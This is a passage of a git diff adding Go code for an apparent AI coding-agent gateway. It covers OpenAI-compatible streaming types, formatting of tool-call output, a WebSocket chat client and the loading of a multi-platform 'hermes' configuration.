+// PoolFullError is returned when the session pool is at capacity.
+type PoolFullError struct {
+	Max int
+}
+
+func (e *PoolFullError) Error() string {
+	return "session pool is at capacity"
+}
diff --git a/internal/gateway/streaming.go b/internal/gateway/streaming.go
new file mode 100644
index 0000000..dee2399
--- /dev/null
+++ b/internal/gateway/streaming.go
@@ -0,0 +1,160 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"time"
+)
+
+// SSEWriter helps write Server-Sent Events to an HTTP response.
+type SSEWriter struct {
+	w       http.ResponseWriter
+	flusher http.Flusher
+	model   string
+	id      string
+	created int64
+	sessID  string
+}
+
+// NewSSEWriter creates an SSE writer and sets the appropriate headers.
+func NewSSEWriter(w http.ResponseWriter, model, sessionID string) *SSEWriter {
+	w.Header().Set("Content-Type", "text/event-stream")
+	w.Header().Set("Cache-Control", "no-cache")
+	w.Header().Set("Connection", "keep-alive")
+	w.Header().Set("X-Accel-Buffering", "no") // disable nginx buffering
+
+	flusher, _ := w.(http.Flusher)
+
+	id := newCompletionID()
+	return &SSEWriter{
+		w:       w,
+		flusher: flusher,
+		model:   model,
+		id:      id,
+		created: time.Now().Unix(),
+		sessID:  sessionID,
+	}
+}
+
+// WriteContentDelta sends a text content delta chunk.
+func (s *SSEWriter) WriteContentDelta(content string) {
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index: 0,
+				Delta: &ResponseMessage{Content: content},
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+}
+
+// WriteRoleDelta sends the initial role delta.
+func (s *SSEWriter) WriteRoleDelta() {
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index: 0,
+				Delta: &ResponseMessage{Role: "assistant"},
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+}
+
+// WriteToolStatusContent sends a tool status in content mode (text in content delta).
+// Uses a compact title like "read: path=main.go" rather than dumping full args.
+func (s *SSEWriter) WriteToolStatusContent(title, status string) {
+	text := fmt.Sprintf("[%s] %s\n", status, title)
+	s.WriteContentDelta(text)
+}
+
+// WriteToolResult sends formatted tool output based on detail level.
+func (s *SSEWriter) WriteToolResult(tc *toolCallInfo, detail string) {
+	text := formatToolResult(tc, detail)
+	s.WriteContentDelta(text)
+}
+
+// WriteToolStatusEvent sends a tool status as an SSE event (sse_event mode).
+func (s *SSEWriter) WriteToolStatusEvent(toolName, status string, args map[string]any) {
+	evt := ToolStatusEvent{
+		Tool:   toolName,
+		Status: status,
+		Args:   args,
+	}
+	data, _ := json.Marshal(evt)
+	fmt.Fprintf(s.w, "event: tool_status\ndata: %s\n\n", data)
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+// WriteDone sends the final chunk with finish_reason and usage, then [DONE].
+func (s *SSEWriter) WriteDone(usage *CompletionUsage) {
+	finishReason := "stop"
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Delta:        &ResponseMessage{},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      usage,
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+
+	// Send [DONE] sentinel
+	fmt.Fprintf(s.w, "data: [DONE]\n\n")
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+// WriteError sends an error as a final chunk.
+func (s *SSEWriter) WriteError(errMsg string) {
+	finishReason := "stop"
+	chunk := ChatCompletionChunk{
+		ID:      s.id,
+		Object:  "chat.completion.chunk",
+		Created: s.created,
+		Model:   s.model,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Delta:        &ResponseMessage{Content: "\n\n[Error: " + errMsg + "]"},
+				FinishReason: &finishReason,
+			},
+		},
+		XSessionID: s.sessID,
+	}
+	s.writeData(chunk)
+	fmt.Fprintf(s.w, "data: [DONE]\n\n")
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
+
+func (s *SSEWriter) writeData(v any) {
+	data, _ := json.Marshal(v)
+	fmt.Fprintf(s.w, "data: %s\n\n", data)
+	if s.flusher != nil {
+		s.flusher.Flush()
+	}
+}
diff --git a/internal/gateway/tool_format.go b/internal/gateway/tool_format.go
new file mode 100644
index 0000000..73d4de1
--- /dev/null
+++ b/internal/gateway/tool_format.go
@@ -0,0 +1,302 @@
+package gateway
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// toolCallInfo tracks a tool call through its lifecycle.
+type toolCallInfo struct {
+	Name   string
+	Args   map[string]any
+	Result string
+	Diff   *tools.FileDiff
+	Error  error
+	Status string // "running", "completed", "failed"
+}
+
+// formatToolResult dispatches to collapsed or expanded based on detail level.
+// detail: "collapsed" (default) or "expanded"
+func formatToolResult(tc *toolCallInfo, detail string) string {
+	if detail == "expanded" {
+		return formatToolExpanded(tc)
+	}
+	return formatToolCollapsed(tc)
+}
+
+// formatToolCollapsed renders a one-line summary.
+// Most tools: 🔧 `read` main.go ✅
+// edit/write with diff: always shows path + diff (never fully collapsed)
+// Errors: always shown
+func formatToolCollapsed(tc *toolCallInfo) string {
+	var sb strings.Builder
+
+	// Errors are always shown in full
+	if tc.Error != nil {
+		sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+		sb.WriteString("\n\n")
+		sb.WriteString(fmt.Sprintf("> ❌ Error: %v\n\n", tc.Error))
+		return sb.String()
+	}
+
+	// edit/write with diff — always show path + diff
+	if (tc.Name == "edit" || tc.Name == "write") && tc.Diff != nil && tc.Diff.Unified != "" {
+		sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+		sb.WriteString("\n\n")
+		sb.WriteString(fmt.Sprintf("```diff\n%s", tc.Diff.Unified))
+		if !strings.HasSuffix(tc.Diff.Unified, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+		return sb.String()
+	}
+
+	// Everything else: one-line summary
+	status := "✅"
+	if tc.Status == "failed" {
+		status = "❌"
+	}
+	sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+	sb.WriteString(" ")
+	sb.WriteString(status)
+	sb.WriteString("\n\n")
+	return sb.String()
+}
+
+// formatToolExpanded renders a tool call with full output in code fences.
+func formatToolExpanded(tc *toolCallInfo) string {
+	var sb strings.Builder
+
+	sb.WriteString(formatToolHeaderMD(tc.Name, tc.Args))
+	sb.WriteString("\n\n")
+
+	// Error
+	if tc.Error != nil {
+		sb.WriteString(fmt.Sprintf("> ❌ Error: %v\n\n", tc.Error))
+		return sb.String()
+	}
+
+	// Diff output (edit/write with diff)
+	if tc.Diff != nil && tc.Diff.Unified != "" {
+		sb.WriteString(fmt.Sprintf("```diff\n%s", tc.Diff.Unified))
+		if !strings.HasSuffix(tc.Diff.Unified, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+		return sb.String()
+	}
+
+	// Result output
+	if tc.Result != "" {
+		lang := inferCodeLang(tc.Name, tc.Args)
+		sb.WriteString(fmt.Sprintf("```%s\n%s", lang, tc.Result))
+		if !strings.HasSuffix(tc.Result, "\n") {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("```\n\n")
+	}
+
+	return sb.String()
+}
+
+// formatToolHeaderMD builds the tool header line.
+// Uses plain text with emoji prefix — no markdown formatting to avoid
+// rendering issues when streamed in chunks.
+func formatToolHeaderMD(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("🔧 %s", name)
+	}
+	return fmt.Sprintf("🔧 %s: %s", name, keyArg)
+}
+
+// formatToolRunning returns a status line when a tool starts executing.
+func formatToolRunning(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("⏳ %s running...\n\n", name)
+	}
+	return fmt.Sprintf("⏳ %s: %s\n\n", name, keyArg)
+}
+
+// formatToolHeader builds the header line (used by SSE content status).
+func formatToolHeader(name string, args map[string]any) string {
+	keyArg := toolKeyArg(name, args)
+	if keyArg == "" {
+		return fmt.Sprintf("🔧 [%s]", name)
+	}
+	return fmt.Sprintf("🔧 [%s] %s", name, keyArg)
+}
+
+// --- Language inference ---
+
+// inferCodeLang guesses the code fence language from tool name and args.
+func inferCodeLang(toolName string, args map[string]any) string {
+	switch toolName {
+	case "bash":
+		return "bash"
+	case "read", "write":
+		if path, ok := args["path"].(string); ok {
+			return langFromPath(path)
+		}
+	case "grep", "find", "ls":
+		return "" // plain text
+	}
+	return ""
+}
+
+// langFromPath infers a code fence language from a file extension.
+func langFromPath(path string) string {
+	ext := strings.ToLower(filepath.Ext(path))
+	switch ext {
+	case ".go":
+		return "go"
+	case ".py":
+		return "python"
+	case ".js":
+		return "javascript"
+	case ".ts":
+		return "typescript"
+	case ".tsx":
+		return "tsx"
+	case ".jsx":
+		return "jsx"
+	case ".rs":
+		return "rust"
+	case ".rb":
+		return "ruby"
+	case ".java":
+		return "java"
+	case ".c", ".h":
+		return "c"
+	case ".cpp", ".cc", ".cxx", ".hpp":
+		return "cpp"
+	case ".cs":
+		return "csharp"
+	case ".swift":
+		return "swift"
+	case ".kt", ".kts":
+		return "kotlin"
+	case ".sh", ".bash":
+		return "bash"
+	case ".zsh":
+		return "zsh"
+	case ".ps1":
+		return "powershell"
+	case ".sql":
+		return "sql"
+	case ".html", ".htm":
+		return "html"
+	case ".css":
+		return "css"
+	case ".scss":
+		return "scss"
+	case ".json":
+		return "json"
+	case ".jsonc":
+		return "jsonc"
+	case ".yaml", ".yml":
+		return "yaml"
+	case ".toml":
+		return "toml"
+	case ".xml":
+		return "xml"
+	case ".md", ".markdown":
+		return "markdown"
+	case ".dockerfile":
+		return "dockerfile"
+	case ".tf":
+		return "hcl"
+	case ".lua":
+		return "lua"
+	case ".r":
+		return "r"
+	case ".php":
+		return "php"
+	case ".pl", ".pm":
+		return "perl"
+	case ".ex", ".exs":
+		return "elixir"
+	case ".erl":
+		return "erlang"
+	case ".hs":
+		return "haskell"
+	case ".scala":
+		return "scala"
+	case ".clj":
+		return "clojure"
+	case ".vim":
+		return "vim"
+	case ".proto":
+		return "protobuf"
+	case ".graphql", ".gql":
+		return "graphql"
+	case ".ini", ".cfg", ".conf":
+		return "ini"
+	case ".env":
+		return "bash"
+	case ".makefile":
+		return "makefile"
+	default:
+		base := strings.ToLower(filepath.Base(path))
+		switch base {
+		case "makefile", "gnumakefile":
+			return "makefile"
+		case "dockerfile":
+			return "dockerfile"
+		case "vagrantfile", "gemfile":
+			return "ruby"
+		}
+		return ""
+	}
+}
+
+// --- Key arg extraction ---
+
+// toolKeyArg extracts the most relevant argument for display.
+func toolKeyArg(name string, args map[string]any) string {
+	if args == nil {
+		return ""
+	}
+	switch name {
+	case "bash":
+		if cmd, ok := args["command"].(string); ok {
+			if len(cmd) > 120 {
+				return cmd[:120] + "..."
+			}
+			return cmd
+		}
+	case "read", "write", "edit", "ls":
+		if path, ok := args["path"].(string); ok {
+			return path
+		}
+	case "grep":
+		var parts []string
+		if pattern, ok := args["pattern"].(string); ok {
+			parts = append(parts, pattern)
+		}
+		if path, ok := args["path"].(string); ok {
+			parts = append(parts, path)
+		}
+		return strings.Join(parts, " ")
+	case "find":
+		var parts []string
+		if pattern, ok := args["pattern"].(string); ok {
+			parts = append(parts, pattern)
+		}
+		if path, ok := args["path"].(string); ok {
+			parts = append(parts, path)
+		}
+		return strings.Join(parts, " ")
+	default:
+		for _, key := range []string{"path", "command", "pattern", "query", "name"} {
+			if v, ok := args[key].(string); ok && v != "" {
+				return v
+			}
+		}
+	}
+	return ""
+}
diff --git a/internal/gateway/types.go b/internal/gateway/types.go
new file mode 100644
index 0000000..bfed1cb
--- /dev/null
+++ b/internal/gateway/types.go
@@ -0,0 +1,158 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"time"
+)
+
+// --- OpenAI-compatible request types ---
+
+// ChatCompletionRequest represents the OpenAI chat completions request.
+type ChatCompletionRequest struct {
+	Model       string           `json:"model,omitempty"`
+	Messages    []RequestMessage `json:"messages"`
+	Stream      bool             `json:"stream,omitempty"`
+	Temperature *float64         `json:"temperature,omitempty"`
+	TopP        *float64         `json:"top_p,omitempty"`
+	MaxTokens   int              `json:"max_tokens,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID  string `json:"x_session_id,omitempty"`
+	XMode       string `json:"x_mode,omitempty"`
+	XWorkingDir string `json:"x_working_dir,omitempty"`
+}
+
+// RequestMessage represents a message in the OpenAI request.
+type RequestMessage struct {
+	Role    string `json:"role"`
+	Content string `json:"content"`
+	Name    string `json:"name,omitempty"`
+}
+
+// --- OpenAI-compatible response types ---
+
+// ChatCompletionResponse is the non-streaming response.
+type ChatCompletionResponse struct {
+	ID      string                   `json:"id"`
+	Object  string                   `json:"object"`
+	Created int64                    `json:"created"`
+	Model   string                   `json:"model"`
+	Choices []ChatCompletionChoice   `json:"choices"`
+	Usage   *CompletionUsage         `json:"usage,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID string         `json:"x_session_id,omitempty"`
+	XCommand   string         `json:"x_command,omitempty"`
+	XToolCalls []XToolCall    `json:"x_tool_calls,omitempty"`
+}
+
+// ChatCompletionChoice is a single choice in the response.
+type ChatCompletionChoice struct {
+	Index        int              `json:"index"`
+	Message      *ResponseMessage `json:"message,omitempty"`
+	Delta        *ResponseMessage `json:"delta,omitempty"`
+	FinishReason *string          `json:"finish_reason"`
+}
+
+// ResponseMessage is the assistant's response message.
+type ResponseMessage struct {
+	Role    string `json:"role,omitempty"`
+	Content string `json:"content,omitempty"`
+}
+
+// CompletionUsage tracks token counts.
+type CompletionUsage struct {
+	PromptTokens     int `json:"prompt_tokens"`
+	CompletionTokens int `json:"completion_tokens"`
+	TotalTokens      int `json:"total_tokens"`
+}
+
+// XToolCall is a VibeCoding extension for exposing tool call info.
+type XToolCall struct {
+	Name   string         `json:"name"`
+	Args   map[string]any `json:"args,omitempty"`
+	Status string         `json:"status"` // "running", "completed", "failed"
+}
+
+// --- Streaming chunk types ---
+
+// ChatCompletionChunk is the streaming chunk response.
+type ChatCompletionChunk struct {
+	ID      string                 `json:"id"`
+	Object  string                 `json:"object"`
+	Created int64                  `json:"created"`
+	Model   string                 `json:"model"`
+	Choices []ChatCompletionChoice `json:"choices"`
+	Usage   *CompletionUsage       `json:"usage,omitempty"`
+
+	// VibeCoding extensions
+	XSessionID string `json:"x_session_id,omitempty"`
+}
+
+// --- SSE tool_status event (for sse_event mode) ---
+
+// ToolStatusEvent is sent via SSE event: tool_status.
+type ToolStatusEvent struct {
+	Tool   string         `json:"tool"`
+	Status string         `json:"status"` // "running", "completed", "failed"
+	Args   map[string]any `json:"args,omitempty"`
+}
+
+// --- Model list types ---
+
+// ModelListResponse is the response for GET /v1/models.
+type ModelListResponse struct {
+	Object string      `json:"object"`
+	Data   []ModelItem `json:"data"`
+}
+
+// ModelItem represents one model in the list.
+type ModelItem struct {
+	ID      string `json:"id"`
+	Object  string `json:"object"`
+	Created int64  `json:"created"`
+	OwnedBy string `json:"owned_by"`
+}
+
+// --- Health ---
+
+// HealthResponse is the response for GET /health.
+type HealthResponse struct {
+	Status   string `json:"status"`
+	Version  string `json:"version"`
+	Sessions int    `json:"sessions"`
+}
+
+// --- Error response ---
+
+// ErrorResponse is the standard OpenAI error format.
+type ErrorResponse struct {
+	Error ErrorDetail `json:"error"`
+}
+
+// ErrorDetail contains error information.
+type ErrorDetail struct {
+	Message string `json:"message"`
+	Type    string `json:"type"`
+	Code    string `json:"code,omitempty"`
+}
+
+// --- Helpers ---
+
+func newCompletionID() string {
+	return fmt.Sprintf("chatcmpl-%d", time.Now().UnixNano())
+}
+
+func newCommandCompletionID() string {
+	return fmt.Sprintf("chatcmpl-cmd-%d", time.Now().UnixNano())
+}
+
+func stringPtr(s string) *string {
+	return &s
+}
+
+func marshalJSON(v any) []byte {
+	data, _ := json.Marshal(v)
+	return data
+}
diff --git a/internal/hermes/client.go b/internal/hermes/client.go
new file mode 100644
index 0000000..077bef8
--- /dev/null
+++ b/internal/hermes/client.go
@@ -0,0 +1,211 @@
+package hermes
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"os/signal"
+	"strings"
+	"syscall"
+
+	"golang.org/x/net/websocket"
+)
+
+// ClientOptions configures the hermes client.
+type ClientOptions struct {
+	URL       string
+	SessionID string
+	AuthToken string
+}
+
+// WSEvent matches the ws.WSEvent type for client-side parsing.
+type clientWSEvent struct {
+	Type       string `json:"type"`
+	Content    string `json:"content,omitempty"`
+	Message    string `json:"message,omitempty"`
+	Command    string `json:"command,omitempty"`
+	Tool       string `json:"tool,omitempty"`
+	CallID     string `json:"call_id,omitempty"`
+	StopReason string `json:"stop_reason,omitempty"`
+	Error      bool   `json:"error,omitempty"`
+	Code       string `json:"code,omitempty"`
+}
+
+// clientMessage matches the ws.ClientMessage type.
+type clientMessage struct {
+	Type    string `json:"type"`
+	Content string `json:"content,omitempty"`
+}
+
+// RunClient starts the hermes client, connecting to the WebSocket server.
+func RunClient(opts ClientOptions) error {
+	// Build WebSocket URL
+	wsURL := opts.URL
+	if wsURL == "" {
+		wsURL = "ws://localhost:8090/ws"
+	}
+	if opts.SessionID != "" {
+		if strings.Contains(wsURL, "?") {
+			wsURL += "&session=" + opts.SessionID
+		} else {
+			wsURL += "?session=" + opts.SessionID
+		}
+	}
+
+	// Connect to WebSocket
+	fmt.Fprintf(os.Stderr, "Connecting to %s...\n", wsURL)
+	wsCfg, err := websocket.NewConfig(wsURL, "http://localhost/")
+	if err != nil {
+		return fmt.Errorf("websocket config: %w", err)
+	}
+	if opts.AuthToken != "" {
+		if wsCfg.Header == nil {
+			wsCfg.Header = http.Header{}
+		}
+		wsCfg.Header.Set("Authorization", "Bearer "+opts.AuthToken)
+	}
+	ws, err := websocket.DialConfig(wsCfg)
+	if err != nil {
+		return fmt.Errorf("connect: %w", err)
+	}
+	defer ws.Close()
+
+	fmt.Fprintf(os.Stderr, "Connected. Type /help for commands, Ctrl+C to exit.\n\n")
+
+	// Start receive goroutine
+	done := make(chan struct{})
+	go receiveEvents(ws, done)
+
+	// Handle signals
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	// Read input loop
+	scanner := bufio.NewScanner(os.Stdin)
+	for {
+		select {
+		case <-done:
+			return nil
+		case <-sigCh:
+			fmt.Fprintf(os.Stderr, "\nDisconnected.\n")
+			return nil
+		default:
+		}
+
+		fmt.Print("> ")
+		if !scanner.Scan() {
+			break
+		}
+		input := strings.TrimSpace(scanner.Text())
+		if input == "" {
+			continue
+		}
+
+		// Handle local commands
+		if input == "/help" {
+			printHelp()
+			continue
+		}
+		if input == "/quit" || input == "/exit" {
+			return nil
+		}
+
+		// Send to server
+		msg := clientMessage{Type: "message", Content: input}
+		if strings.HasPrefix(input, "/") {
+			msg.Type = "command"
+		}
+		if err := websocket.JSON.Send(ws, msg); err != nil {
+			fmt.Fprintf(os.Stderr, "Send error: %v\n", err)
+			return err
+		}
+	}
+
+	return nil
+}
+
+// receiveEvents reads events from the WebSocket and prints them.
+func receiveEvents(ws *websocket.Conn, done chan struct{}) {
+	defer close(done)
+
+	for {
+		var ev clientWSEvent
+		if err := websocket.JSON.Receive(ws, &ev); err != nil {
+			if err == io.EOF {
+				fmt.Fprintf(os.Stderr, "\nConnection closed.\n")
+			} else {
+				fmt.Fprintf(os.Stderr, "\nReceive error: %v\n", err)
+			}
+			return
+		}
+
+		switch ev.Type {
+		case "connected":
+			fmt.Fprintf(os.Stderr, "✓ Connected (session: %s, version: %s)\n\n", ev.Content, ev.Message)
+
+		case "text_delta":
+			fmt.Print(ev.Content)
+
+		case "think_delta":
+			// Thinking is shown in dim
+			fmt.Printf("\033[2m%s\033[0m", ev.Content)
+
+		case "tool_call":
+			fmt.Fprintf(os.Stderr, "\n🔧 [%s] calling...\n", ev.Tool)
+
+		case "tool_result":
+			status := "✅"
+			if ev.Error {
+				status = "❌"
+			}
+			fmt.Fprintf(os.Stderr, "%s [%s]\n", status, ev.Tool)
+
+		case "tool_diff":
+			fmt.Fprintf(os.Stderr, "📝 [%s] %s\n", ev.Tool, ev.CallID)
+
+		case "status":
+			fmt.Fprintf(os.Stderr, "\n📋 %s\n", ev.Message)
+
+		case "done":
+			fmt.Print("\n\n")
+			if ev.StopReason != "" && ev.StopReason != "end_turn" {
+				fmt.Fprintf(os.Stderr, "(stopped: %s)\n", ev.StopReason)
+			}
+
+		case "command_result":
+			if ev.Message != "" {
+				fmt.Fprintf(os.Stderr, "%s\n", ev.Message)
+			}
+
+		case "error":
+			fmt.Fprintf(os.Stderr, "\n❌ Error: %s\n", ev.Message)
+
+		case "pong":
+			// Ignore pong
+
+		case "usage":
+			// Usage info not shown in client
+
+		default:
+			// Unknown event type - ignore
+		}
+	}
+}
+
+// printHelp shows available commands.
+func printHelp() {
+	fmt.Println("Commands:")
+	fmt.Println("  /help          Show this help")
+	fmt.Println("  /new           Start a new session")
+	fmt.Println("  /clear         Clear current session")
+	fmt.Println("  /status        Show session status")
+	fmt.Println("  /sessions      List active sessions")
+	fmt.Println("  /mode <mode>   Set mode (plan/agent/yolo)")
+	fmt.Println("  /compact       Trigger compaction")
+	fmt.Println("  /quit          Exit")
+	fmt.Println()
+	fmt.Println("Any other input starting with / is sent as a command to the server.")
+	fmt.Println("All other input is sent as a chat message.")
+}
diff --git a/internal/hermes/config.go b/internal/hermes/config.go
new file mode 100644
index 0000000..112ce8b
--- /dev/null
+++ b/internal/hermes/config.go
@@ -0,0 +1,392 @@
+package hermes
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// HermesConfig holds all configuration for hermes mode.
+type HermesConfig struct {
+	Server          ServerConfig   `json:"server"`
+	DefaultProvider string         `json:"default_provider,omitempty"`
+	DefaultModel    string         `json:"default_model,omitempty"`
+	MultiAgent      bool           `json:"multi_agent,omitempty"`
+	Sandbox         bool           `json:"sandbox,omitempty"`
+	Wechat          WechatConfig   `json:"wechat"`
+	Feishu          FeishuConfig   `json:"feishu"`
+	Webhooks        WebhookConfig  `json:"webhooks"`
+	A2A             A2AConfig      `json:"a2a"`
+	Cron            CronConfig     `json:"cron"`
+	Memory          MemoryConfig   `json:"memory"`
+	Security        SecurityConfig `json:"security"`
+	Hooks           HooksConfig    `json:"hooks"`
+	Agent           AgentConfig    `json:"agent"`
+	WorkDir         string         `json:"work_dir"`
+}
+
+// ServerConfig defines the WebSocket + HTTP gateway settings.
+type ServerConfig struct {
+	Port      int    `json:"port"`
+	Host      string `json:"host"`
+	AuthToken string `json:"auth_token"`
+}
+
+// WechatConfig defines WeChat iLink platform settings.
+type WechatConfig struct {
+	Enabled      bool     `json:"enabled"`
+	CredPath     string   `json:"cred_path"`
+	WorkDir      string   `json:"work_dir"`
+	AllowedUsers []string `json:"allowed_users"`
+	AutoTyping   bool     `json:"auto_typing"`
+}
+
+// FeishuConfig defines Feishu (Lark) platform settings.
+type FeishuConfig struct {
+	Enabled      bool     `json:"enabled"`
+	AppID        string   `json:"app_id"`
+	AppSecret    string   `json:"app_secret"`
+	WorkDir      string   `json:"work_dir"`
+	AllowedUsers []string `json:"allowed_users"`
+}
+
+// WebhookConfig defines inbound webhook settings.
+type WebhookConfig struct {
+	Enabled bool           `json:"enabled"`
+	Secret  string         `json:"secret"`
+	Routes  []WebhookRoute `json:"routes"`
+}
+
+// WebhookRoute maps an inbound webhook path to an agent skill + delivery.
+type WebhookRoute struct {
+	Path           string   `json:"path"`
+	Events         []string `json:"events"`
+	Skill          string   `json:"skill"`
+	Delivery       string   `json:"delivery"`
+	DeliveryTarget string   `json:"delivery_target,omitempty"`
+}
+
+// A2AConfig defines A2A protocol settings.
+type A2AConfig struct {
+	Enabled bool `json:"enabled"`
+	Port    int  `json:"port,omitempty"`
+}
+
+// CronConfig defines cron scheduler settings.
+type CronConfig struct {
+	Enabled   bool   `json:"enabled"`
+	StorePath string `json:"store_path,omitempty"` // empty = <sessionDir>/hermes/cron.json
+	Interval  int    `json:"interval,omitempty"`   // seconds between checks (default 30)
+}
+
+// MemoryConfig defines persistent memory settings.
+type MemoryConfig struct {
+	Enabled bool   `json:"enabled"`
+	Path    string `json:"path"` // empty = auto-discover .vibe/memory.md → <GLOBAL_DIR>/memory.md
+}
+
+// SecurityConfig defines security settings.
+type SecurityConfig struct {
+	SmartApprovals  bool     `json:"smart_approvals"`
+	AllowedWorkDirs []string `json:"allowed_work_dirs"`
+}
+
+// HooksConfig defines shell hook scripts.
+type HooksConfig struct {
+	PreToolCall  string `json:"pre_tool_call"`
+	PostToolCall string `json:"post_tool_call"`
+}
+
+// AgentConfig defines agent behavior settings.
+type AgentConfig struct {
+	MaxTurns                 int     `json:"max_turns"`
+	BudgetPressure           bool    `json:"budget_pressure"`
+	ContextPressure          bool    `json:"context_pressure"`
+	BudgetPressureThreshold  float64 `json:"budget_pressure_threshold,omitempty"`  // remaining ratio (0-1), default 0.20
+	ContextPressureThreshold float64 `json:"context_pressure_threshold,omitempty"` // usage ratio (0-1), default 0.55
+}
+
+// DefaultHermesConfig returns the default configuration.
+func DefaultHermesConfig() *HermesConfig {
+	return &HermesConfig{
+		Server: ServerConfig{
+			Port: 8090,
+			Host: "0.0.0.0",
+		},
+		Wechat: WechatConfig{
+			AutoTyping: true,
+		},
+		Cron: CronConfig{
+			Enabled: true,
+		},
+		Memory: MemoryConfig{
+			Enabled: true,
+		},
+		Security: SecurityConfig{
+			SmartApprovals: true,
+		},
+		Agent: AgentConfig{
+			MaxTurns:                 90,
+			BudgetPressure:           true,
+			ContextPressure:          true,
+			BudgetPressureThreshold:  0.20,
+			ContextPressureThreshold: 0.55,
+		},
+		WorkDir: ".",
+	}
+}
+
+// HermesConfigPath returns the path to the global hermes.json.
+func HermesConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "hermes.json")
+}
+
+// ProjectHermesConfigPath returns the path to the project-level hermes.json.
+func ProjectHermesConfigPath() string {
+	return filepath.Join(".vibe", "hermes.json")
+}
+
+// LoadHermesConfig loads the hermes configuration, merging global + project.
+// Priority: defaults → <GLOBAL_DIR>/hermes.json → .vibe/hermes.json
+func LoadHermesConfig() (*HermesConfig, error) {
+	cfg := DefaultHermesConfig()
+
+	// 1. Load global config
+	globalPath := HermesConfigPath()
+	if data, err := os.ReadFile(globalPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse global hermes config %s: %w", globalPath, err)
+		}
+	} else if !os.IsNotExist(err) {
+		return nil, fmt.Errorf("read global hermes config %s: %w", globalPath, err)
+	}
+
+	// 2. Overlay project-level config
+	projectPath := ProjectHermesConfigPath()
+	if data, err := os.ReadFile(projectPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse project hermes config %s: %w", projectPath, err)
+		}
+	}
+
+	// Resolve environment variable references
+	cfg.resolveEnvVars()
+
+	return cfg, nil
+}
+
+// LoadHermesConfigFrom loads hermes config from a specific path.
+func LoadHermesConfigFrom(path string) (*HermesConfig, error) {
+	cfg := DefaultHermesConfig()
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return cfg, nil
+		}
+		return nil, fmt.Errorf("read hermes config %s: %w", path, err)
+	}
+	if err := json.Unmarshal(data, cfg); err != nil {
+		return nil, fmt.Errorf("parse hermes config %s: %w", path, err)
+	}
+	cfg.resolveEnvVars()
+	return cfg, nil
+}
+
+// GetListenAddr returns the listen address string.
+func (c *HermesConfig) GetListenAddr() string {
+	return fmt.Sprintf("%s:%d", c.Server.Host, c.Server.Port)
+}
+
+// GetWorkDir returns the resolved work directory.
+// Falls back to current directory if not set.
+func (c *HermesConfig) GetWorkDir() string {
+	if c.WorkDir != "" && c.WorkDir != "." {
+		return c.WorkDir
+	}
+	cwd, err := os.Getwd()
+	if err != nil {
+		return "."
+	}
+	return cwd
+}
+
+// GetPlatformWorkDir returns the work directory for a specific platform.
+// Priority: platform work_dir → global work_dir → cwd
+func (c *HermesConfig) GetPlatformWorkDir(platform string) string {
+	switch platform {
+	case "wechat":
+		if c.Wechat.WorkDir != "" {
+			return c.Wechat.WorkDir
+		}
+	case "feishu":
+		if c.Feishu.WorkDir != "" {
+			return c.Feishu.WorkDir
+		}
+	}
+	return c.GetWorkDir()
+}
+
+// GetWechatCredPath returns the wechat credentials path.
+func (c *HermesConfig) GetWechatCredPath() string {
+	if c.Wechat.CredPath != "" {
+		return c.Wechat.CredPath
+	}
+	return filepath.Join(config.ConfigDir(), "wechat-credentials.json")
+}
+
+// InitHermesConfig creates a hermes.json config template.
+// If project is true, writes to .vibe/hermes.json; otherwise <GLOBAL_DIR>/hermes.json.
+func InitHermesConfig(project, force bool) (string, error) {
+	var path string
+	if project {
+		path = ProjectHermesConfigPath()
+	} else {
+		path = HermesConfigPath()
+	}
+
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("hermes.json already exists: %s", path)
+		}
+	}
+
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return "", fmt.Errorf("create directory %s: %w", dir, err)
+	}
+
+	var cfg *HermesConfig
+	if project {
